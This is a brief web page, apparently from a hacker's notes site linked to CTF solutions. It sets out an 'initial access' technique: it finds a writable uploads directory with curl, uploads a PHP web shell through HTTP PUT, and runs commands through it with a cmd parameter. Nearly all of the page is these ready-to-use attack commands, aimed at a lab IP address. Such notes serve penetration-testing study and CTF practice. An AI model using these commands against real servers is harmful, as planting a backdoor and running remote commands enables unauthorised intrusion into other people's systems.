>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Initial Access / HTTP PUT File Upload

HTTP PUT File Upload

Initial Access Web Attacks linux

Discover writable upload directory

curl -v http://10.10.12.3/uploads

Upload a webshell via PUT

curl http://10.10.12.3/uploads/ --upload-file /usr/share/webshells/php/simple-backdoor.php

Trigger via browser

firefox http://10.10.12.3/uploads/simple-backdoor.php?cmd=whoami